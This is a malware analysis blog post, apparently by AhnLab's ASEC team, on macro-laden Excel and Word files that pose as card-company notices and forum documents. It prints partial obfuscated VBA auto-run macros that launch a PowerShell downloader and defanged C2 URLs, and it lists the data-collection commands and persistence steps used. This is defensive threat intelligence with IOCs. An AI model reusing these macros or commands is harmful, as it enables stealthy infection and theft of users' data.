Malware Disguised as Normal Excel and Word Documents

Malware Analysis
1

The ASEC analysis team has recently confirmed that document files with a certain type of malicious macro have been distributed continuously. The malicious files are distributed with various filenames as shown below. As they all contain content disguised as normal files, users must exercise caution when dealing with them.

  • Constitution Day International Academic Forum.doc
  • 28th North Korea-South Korea Relations Experts Discussion***.doc
  • Honorarium Template.doc
  • email_20210516.xls
  • email_20210414.xls

Recently discovered excel files contain the date of distribution on their filenames such as ’email_20210516.xls’ and urge users to enable macro. Also, the attackers added information about domestic card companies at the bottom of pages to disguise the files as document sent by those companies.

When users click Enable Content, a window for entering mail confirmation number appears, making the file look like a normal document. It requests users to enter their date of birth in a 6-digit number. If a 6-digit is not entered, a popup appears.

After the 6-digit number is entered, the following sheet hidden inside the file appears. For this sheet, the attacker used the information of a bank instead of the impersonated card company above.

867×1287
Upon entering password

The malicious macro existing in the excel file is automatically run when users enable macros. The macro is a powershell command that connects to hxxp://manstr.myartsonline.com/pc/kj.txt to download and run additional scripts.

705×36
Process tree upon running macro

The word file which has the same malicious macro as that of the excel file shown above was distributed with the filename of ‘Constitution Day International Academic Forum.doc.’ It contains an image urging users to enable macro.

Upon clicking Enable Content, the file shows a normal-looking document.

As shown below, the word file uses a similar macro code to that found in the excel file. The variable names and formats used in macro codes are the same. When the macro is run, it connects to hxxp://rukagu.mypressonline.com/le/yj.txt to download and run additional scripts.

Private Sub Workbook_Open()
Sheets(“Sheet1”).Select
Sheets(“Sheet2”).Visible = True
Sheets(“Sheet1”).Visible = False
eifhhdfasfiedf
End Sub

Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “+e+z+”, “”)
yhjhfjdhfdhfuesk(0) = “+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+”
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “+e+z+”, “”)
yhjhfjdhfdhfuesk(1) = “+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “+e+z+”, “”)
<omitted>
yhjhfjdhfdhfuesk(6) = “+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+’+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(6), “+e+z+”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function		 Private Sub Document_Open()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub
 <omitted>
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “tuwhn”, “”)
yhjhfjdhfdhfuesk(0) = “tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn “
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “tuwhn”, “”)
yhjhfjdhfdhfuesk(1) = “tuwhnNtuwhnetuwhnttuwhn.tuwhnWtuwhnetuwhnbtuwhnCtuwhnltuwhnituwhnetuwhnntuwhnttuwhn)tuwhn.tuwhnDtuwhnntuwhngtuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), “tuwhn”, “”)
<omitted>
yhjhfjdhfdhfuesk(5) = “etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), “tuwhn”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Excel macro code / Word macro code


The same attacker likely distributed both excel and word files as each downloads a script from each C2 which performs the exact same behaviors of leaking user information, downloading additional scripts, etc. The following shows the script confirmed in C2 (hxxp://warms.atwebpages.com/rh/ee.txt) connected from a distributed file with the filename of Honorarium Template.doc.

888×719
Script confirmed in C2

Its features include uploading user PC information and downloading additional files. The script collects information of the list shown below, saving the collected data in the %APPDATA%\Ahnlab\Ahnlab.hwp file and uploading it to hxxp://warms.atwebpages.com/rh/post.php.

  • Recent Files
  • Program Files (x86) Files and Folders
  • systeminfo Information
  • tasklist Information
869×201
Created log file

Then it downloads a specific string from the hxxp://warms.atwebpages.com/rh/ee.down URL, decodes it, and runs it in the background through the Start-Job –ScriptBlock command. Also, it attempts to create registry with the name of Alzipupdate in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but the data is not normally registered.

843×210

The team could not confirmed what the code does afterward because the downloaded URL is inaccessible. However, a malicious script was additionally discovered in the same domain. The following shows the additional script found in hxxp://warms.atwebpages.com/rh/hollow64.txt.

851×360
Additionally found script

The script, after running %windir%\SysWOW64\cmd.exe, downloads the data shown below from hxxp://warms.atwebpages.com/rh/baymax[numbers].txt and injects it into the process that was executed earlier to perform malicious behaviors.

1024×492
Additionally downloaded malicious data

The malicious PE injected to cmd.exe saves the data inside the directory that contains most recently used document files, data inside the Program Files directory, and systeminfo information to %APPDATA%\Microsoft\Network\Alzip and sends them to wariii.mypressonline[.]com/home/jpg/downpost.php. It then downloads additional malicious files from hxxp://wariii.mypressonline.com/home/jpg/downdownload.php?filename=baymax[numbers] and runs it after saving as %APPDATA%\Microsoft\Network\Alzip.dll.

The downloaded Alzip.dll file injects a malicious PE to svchost.exe and runs %APPDATA%\pagefile.sys after creating it. The pagefile.sys that is ultimately run performs the feature of collecting user information and sending it to e-mail.

768×619
pagefile.sys property

When the pagefile.sys is executed, it replicates itself as %AppData%\OneDriver\down\hancom.dll and checks registries such as SOFTWARE\\VMware, Inc.\\Vmware Tools or SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers. If the registry exists in the operating environment, the file terminates its execution. Then it performs the cmd.exe /c taskkill /f /im daumcleaner.exe command to terminate daumcleaner.exe and then registers hancom.dll to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dropbox.

1024×296
Created Registry

Also, it performs the following command to save the collected information to %AppData%\OneDriver\out\PI_001.dat and then sends it to Flower9801@hanmail[.]net.

-cmd.exe /c ipconfig/all >>”%AppData%\OneDriver\out\PI_001.dat” & arp -a >”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c systeminfo >>”%AppData%\OneDriver\out\PI_001.dat”
-cmd.exe /c tasklist >>”%AppData%\OneDriver\out\PI_001.dat”
List of execution commands

Besides the two files explained earlier, the files with different filenames were not collected. But as both of them are using the same macro code, others are likely to perform the same malicious behaviors shown above.

Malicious document files containing normal content have been steadily distributed since the past. Because they show different screens after running malicious macros, it is difficult for users to acknowledge that these files are malicious. Users should take caution when files urge them to use macros and refrain from opening files with unknown sources.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]
Downloader/DOC.Generic
Downloader/XLS.Agent
Trojan/Win.Agent.C4480883
Trojan/Win.Agent.C4408018

[IOC Info]
1269e2b00fd323a7748215124cb058cd
811f8c88cda9e8c4f448aa6f380e5a93
e61aafd8d7065a2fa8d5a343098b98cb
0629fd238259d7df7aa22ca82ac6b93e
hxxp://warms.atwebpages.com
hxxp://rukagu.mypressonline.com
hxxp://manstr.myartsonline.com
hxxp://wariii.mypressonline.com

The post Malware Disguised as Normal Excel and Word Documents appeared first on ASEC BLOG.

Article Link: Malware Disguised as Normal Excel and Word Documents - ASEC BLOG